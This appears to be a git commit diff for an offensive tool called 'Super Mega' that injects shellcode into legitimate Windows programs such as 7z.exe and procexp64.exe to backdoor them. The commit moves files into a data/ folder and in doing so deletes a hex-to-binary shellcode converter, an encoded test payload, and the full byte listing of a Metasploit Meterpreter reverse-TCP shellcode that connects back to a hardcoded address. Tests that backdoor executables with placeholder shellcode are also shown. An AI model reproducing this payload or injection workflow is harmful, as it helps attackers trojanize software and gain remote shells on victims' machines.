refactor: reorganize files into data/

.gitignore

@@ -1,6 +1,9 @@
-*infected.exe*
+*.exe.injected
-*a.exe*
+*-verify.exe
-exes_more/
+*.infected.exe
+app/upload/*
+data/exes_more/
+data/shellcodes/*.txt
 *.obj
 *.lnk
 /*.bin

model/defs.py

@@ -4,11 +4,11 @@ import os
 class FilePath(str):
     pass
 
-# with shellcodes/createfile.bin
+# with data/shellcodes/createfile.bin
 VerifyFilename: FilePath = r'C:\Temp\a'
 
 # Correlated with real template files
-# in plugins/
+# in data/plugins/
 
 class AllocStyle(Enum):
     RWX = "rwx_1"

phases/injector.py

@@ -1,9 +1,6 @@
 from helper import *
-import shutil
-import pprint
 import logging
 import time
-import tempfile
 import logging
 
 from model.carrier import Carrier, DataReuseEntry

phases/templater.py

@@ -12,8 +12,8 @@ logger = logging.getLogger("Assembler")
 
 
 # INPUT:
-#   plugins/
+#   data/plugins/
-#   source/
+#   data/source/
 #
 # Output:
 #   build/main.c
@@ -34,14 +34,14 @@ def create_c_from_template(
         source_style.value, alloc_style.value, decoder_style.value, exec_style.value
     ))
 
-    filepath = "plugins/allocator/{}.c".format(alloc_style.value)
+    filepath = "data/plugins/allocator/{}.c".format(alloc_style.value)
     with open(filepath, "r", encoding='utf-8') as file:
         plugin_allocator = file.read()
         plugin_allocator = Template(plugin_allocator).render({
             'PAYLOAD_LEN': payload_len,
         })
 
-    filepath = "plugins/decoder/{}.c".format(decoder_style.value)
+    filepath = "data/plugins/decoder/{}.c".format(decoder_style.value)
     with open(filepath, "r", encoding='utf-8') as file:
         plugin_decoder = file.read()
         plugin_decoder = Template(plugin_decoder).render({
@@ -49,8 +49,8 @@ def create_c_from_template(
             'XOR_KEY': config.xor_key,
         })
 
-    filepath = "plugins/executor/{}.c".format(exec_style.value)
+    filepath = "data/plugins/executor/{}.c".format(exec_style.value)
-    with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
+    with open("data/plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
         plugin_executor = file.read()
         plugin_executor = Template(plugin_executor).render({
             'PAYLOAD_LEN': payload_len,
@@ -58,7 +58,7 @@ def create_c_from_template(
     
     if source_style == SourceStyle.peb_walk:
         if use_templates:
-            with open("source/peb_walk/template.c", 'r', encoding='utf-8') as file:
+            with open("data/source/peb_walk/template.c", 'r', encoding='utf-8') as file:
                 template_content = file.read()
                 observer.add_text("main_c_template", template_content)
 
@@ -74,16 +74,16 @@ def create_c_from_template(
                 observer.add_text("main_c_rendered", rendered_template)
 
             # TODO PEB
-            shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
+            shutil.copy("data/source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
         else:
-            observer.add_text("main_c", file_readall_text("source/peb_walk/main.c"))
+            observer.add_text("main_c", file_readall_text("data/source/peb_walk/main.c"))
-            shutil.copy("source/peb_walk/main.c", main_c_file)
+            shutil.copy("data/source/peb_walk/main.c", main_c_file)
             # TODO PEB
-            shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
+            shutil.copy("data/source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
 
     elif source_style == SourceStyle.iat_reuse:
         if use_templates:
-            with open("source/iat_reuse/template.c", 'r', encoding='utf-8') as file:
+            with open("data/source/iat_reuse/template.c", 'r', encoding='utf-8') as file:
                 template_content = file.read()
                 observer.add_text("main_c_template", template_content)
             template = Template(template_content)
@@ -97,5 +97,5 @@ def create_c_from_template(
                 file.write(rendered_template)
                 observer.add_text("main_c_rendered", rendered_template)
         else:
-            observer.add_text("main_c", file_readall_text("source/iat_reuse/main.c"))
+            observer.add_text("main_c", file_readall_text("data/source/iat_reuse/main.c"))
-            shutil.copy("source/iat_reuse/main.c", main_c_file)
+            shutil.copy("data/source/iat_reuse/main.c", main_c_file)

shellcodes/convert.py

@@ -1,24 +0,0 @@
-# Your input string of escaped hex bytes
-#escaped_hex_bytes = "\\x31\\xc0\\x31\\xc9\\x64\\x8b\\x71\\x30\\x8b\\x76\\x0c\\x8b\\x76\\x1c\\x8b\\x56\\x08\\x8b\\x7e\\x20"
-
-import sys
-
-infile = sys.argv[1]
-output_file_name = sys.argv[2]
-
-with open(infile, "r") as f:
-    escaped_hex_bytes = f.read()
-    escaped_hex_bytes = escaped_hex_bytes.replace('\n', '')
-    escaped_hex_bytes = escaped_hex_bytes.replace('\\x', '')
-
-print(escaped_hex_bytes)
-
-
-# Convert the string with escaped hex bytes to actual binary data
-binary_data = bytes.fromhex(escaped_hex_bytes)
-
-# Write the binary data to a file
-with open(output_file_name, "wb") as binary_file:
-    binary_file.write(binary_data)
-
-print(f"Binary file created: {output_file_name}")

shellcodes/createfile.txt

@@ -1,25 +0,0 @@
-\xeb\x27\x5b\x53\x5f\xb0\xa8\xfc\xae\x75\xfd\x57\x59\x53
-\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f
-\xb5\x35\x74\x07\x80\x3e\xa8\x75\xea\xeb\xe6\xff\xe1\xe8
-\xd4\xff\xff\xff\x07\xa8\xfb\x4f\x84\xe3\xf7\xef\xc7\x07
-\x07\x07\x46\x56\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f
-\x8c\x55\x67\x4f\x8c\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75
-\x57\x4f\x08\xb0\x4d\x4d\x4a\x36\xce\x4f\x36\xc7\xab\x3b
-\x66\x7b\x05\x2b\x27\x46\xc6\xce\x0a\x46\x06\xc6\xe5\xea
-\x55\x46\x56\x4f\x8c\x55\x27\x8c\x45\x3b\x4f\x06\xd7\x8c
-\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73\x60\x4f\x06\xd7\x57
-\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7\xe4\x51\x4f\xf8
-\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce\x4f\x36\xc7
-\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6\x4b\x04
-\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23\x4e
-\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7
-\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d
-\x46\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7
-\x5f\x46\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f
-\xbd\x06\x07\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06
-\x07\x07\x46\xbd\x36\x8c\x68\x80\xf8\xd2\xbc\xf7\xb2\xa5
-\x51\x46\xbd\xa1\x92\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b
-\x01\x7b\x0d\x87\xfc\xe7\x72\x02\xbc\x40\x14\x75\x68\x6d
-\x07\x5e\x46\x8e\xdd\xf8\xd2\x64\x6a\x63\x29\x62\x7f\x62
-\x27\x28\x64\x27\x62\x64\x6f\x68\x27\x66\x27\x39\x27\x64
-\x3d\x5b\x73\x62\x6a\x77\x5b\x66\x07\xb5\x35

shellcodes/msf-meterpreter-reversetcp.txt

@@ -1,33 +0,0 @@
-\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50
-\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52
-\x18\x48\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48
-\x8b\x72\x50\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41
-\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41
-\x51\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f
-\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0
-\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b\x48\x18\x49\x01
-\xd0\x50\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88
-\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1
-\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8
-\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44
-\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41
-\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83
-\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9
-\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00
-\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49
-\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x58\x68\x41\x54
-\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5
-\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b
-\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31
-\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41
-\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58
-\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5
-\x85\xc0\x74\x0c\x49\xff\xce\x75\xe5\x68\xf0\xb5\xa2\x56
-\xff\xd5\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04
-\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48
-\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00
-\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53
-\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89
-\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff
-\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff
-\xe7

supermega.py

@@ -1,11 +1,9 @@
 import shutil
-from enum import Enum
 import argparse
 from typing import Dict
 import os
 import logging
 import time
-import pefile
 
 from helper import *
 from config import config
@@ -25,6 +23,7 @@ from log import setup_logging, writelog
 
 
 def main():
+    """Argument parsing for when called from command line"""
     logger.info("Super Mega")
     config.load()
     settings = Settings()
@@ -51,7 +50,7 @@ def main():
         config.ShowCommandOutput = True
 
     if args.verify:
-        settings.payload_path = "shellcodes/createfile.bin"
+        settings.payload_path = "data/shellcodes/createfile.bin"
         settings.verify = True
 
         settings.try_start_final_infected_exe = False
@@ -59,18 +58,18 @@ def main():
         if args.verify == "peb":
             settings.source_style = SourceStyle.peb_walk
             settings.inject_mode = InjectStyle.BackdoorCallInstr
-            settings.inject_exe_in = "exes/7z.exe"
+            settings.inject_exe_in = "data/exes/7z.exe"
-            settings.inject_exe_out = "out/7z-verify.exe"
+            settings.inject_exe_out = "data/exes/7z-verify.exe"
         elif args.verify == "iat":
             settings.source_style = SourceStyle.iat_reuse
             settings.inject_mode = InjectStyle.BackdoorCallInstr
-            settings.inject_exe_in = "exes/procexp64.exe"
+            settings.inject_exe_in = "data/exes/procexp64.exe"
-            settings.inject_exe_out = "out/procexp64-verify.exe"
+            settings.inject_exe_out = "data/exes/procexp64-verify.exe"
         elif args.verify == "rwx":
             settings.source_style = SourceStyle.peb_walk
             settings.inject_mode = InjectStyle.ChangeEntryPoint  # ,2 is broken atm
-            settings.inject_exe_in = "exes/wifiinfoview.exe"
+            settings.inject_exe_in = "data/exes/wifiinfoview.exe"
-            settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
+            settings.inject_exe_out = "data/exes/wifiinfoview.exe-verify.exe"
         else:
             logger.info("Unknown verify option {}, use std/iat".format(args.verify))
             return
@@ -114,7 +113,7 @@ def main():
 
         if not args.shellcode or not args.inject:
             logger.error("Require: --shellcode <shellcode file> --inject <injectable.exe>")
-            logger.info(r"Example: .\supermega.py --shellcode .\shellcodes\calc64.bin --inject .\exes\7z.exe")
+            logger.info(r"Example: .\supermega.py --shellcode .\data\shellcodes\calc64.bin --inject .\data\exes\7z.exe")
             return 1
 
         if args.shellcode:
@@ -133,6 +132,8 @@ def main():
 
 
 def start(settings: Settings):
+    """Main entry point for the application. This is where the magic happens, based on settings"""
+
     # Delete: all old files
     if settings.cleanup_files_on_start:
         clean_files()

tests/test_datareuse.py

@@ -8,7 +8,7 @@ from phases.datareuse import *
 
 class DataReuseTest(unittest.TestCase):
     def test_relocation_list(self):
-        data_reuser = DataReuser("exes/7z.exe")
+        data_reuser = DataReuser("data/exes/7z.exe")
         data_reuser.init()
 
         relocs = data_reuser.get_relocations_for_section(".rdata")
@@ -21,7 +21,7 @@ class DataReuseTest(unittest.TestCase):
 
 
     def test_largestgap(self):
-        data_reuser = DataReuser("exes/7z.exe")
+        data_reuser = DataReuser("data/exes/7z.exe")
         data_reuser.init()
 
         size, start, stop = data_reuser.get_reloc_largest_gap(".rdata")

tests/test_derbackdoorer.py

@@ -28,13 +28,13 @@ class DerBackdoorerTest(unittest.TestCase):
 
     def test_backdoor_ep(self):
         # Write example shellcode
-        shellcode_path = "exes/shellcode.test"
+        shellcode_path = "data/exes/shellcode.test"
         shellcode = b"\x90" * 200
         with open(shellcode_path, "wb") as f:
             f.write(shellcode)
 
-        exe_path = "exes/iattest-full.exe"
+        exe_path = "data/exes/iattest-full.exe"
-        exe_out_path = "exes/iattest-full-test.exe"
+        exe_out_path = "data/exes/iattest-full-test.exe"
 
         shutil.copyfile(exe_path, exe_out_path)
 
@@ -59,12 +59,12 @@ class DerBackdoorerTest(unittest.TestCase):
     def test_backdoor_hijack(self):
         # Write example shellcode
         shellcode = b"\x90" * 200
-        with open("exes/shellcode.test", "wb") as f:
+        with open("data/exes/shellcode.test", "wb") as f:
             f.write(shellcode)
 
-        shellcode_path = "exes/shellcode.test"
+        shellcode_path = "data/exes/shellcode.test"
-        exe_path = "exes/7z.exe"
+        exe_path = "data/exes/7z.exe"
-        exe_out_path = "exes/7z-test.exe"
+        exe_out_path = "data/exes/7z-test.exe"
 
         shutil.copyfile(exe_path, exe_out_path)